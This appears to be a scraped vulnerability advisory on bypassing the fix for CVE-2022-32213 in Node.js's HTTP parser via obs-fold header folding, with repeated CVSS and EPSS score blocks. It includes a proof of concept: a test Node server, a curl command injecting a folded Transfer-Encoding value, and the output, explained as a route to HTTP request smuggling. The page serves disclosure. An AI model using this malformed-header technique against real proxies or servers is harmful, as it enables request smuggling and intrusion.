6.5 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
6.4 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:P/A:N
0.02 Low
EPSS
Percentile
87.4%
The fix for CVE-2022-32213 can be bypass using an obs-fold, which Node’s http parser supports
const http = require('http');
http.createServer((request, response) => {
let body = [];
request.on('error', (err) => {
response.end("error while reading body: " + err)
}).on('data', (chunk) => {
body.push(chunk);
}).on('end', () => {
body = Buffer.concat(body).toString();
response.on('error', (err) => {
response.end("error while sending response: " + err)
});
response.end("Headers: " + JSON.stringify(request.headers));
});
}).listen(5000);
Send the obs-fold via curl
curl -vv -H $'Transfer-Encoding: chunked\r\n abc' --data "A" http://127.0.0.1:5000
See that the server accepted the chunked request, and will incorrectly fold abc to the value of the Transfer-Encoding header. This is seen in the value of “transfer-encoding” as “chunked abc” in the printed headers.
Headers: {"host":"127.0.0.1:5000","user-agent":"curl/7.83.1","accept":"*/*","transfer-encoding":"chunked abc","content-type":"application/x-www-form-urlencoded"}
If nodejs HTTP module is used as a proxy, then it incorrectly parses the transfer-encoding header as indicative of chunked request, while folding the headers and hence forwarding Transfer-Encoding: chunked abc
which is not a valid transfer-encoding header to the downstream server. As such this can lead to the HTTP request smuggling as indicated by CVE-2022-32213.
6.5 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
6.4 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:P/A:N
0.02 Low
EPSS
Percentile
87.4%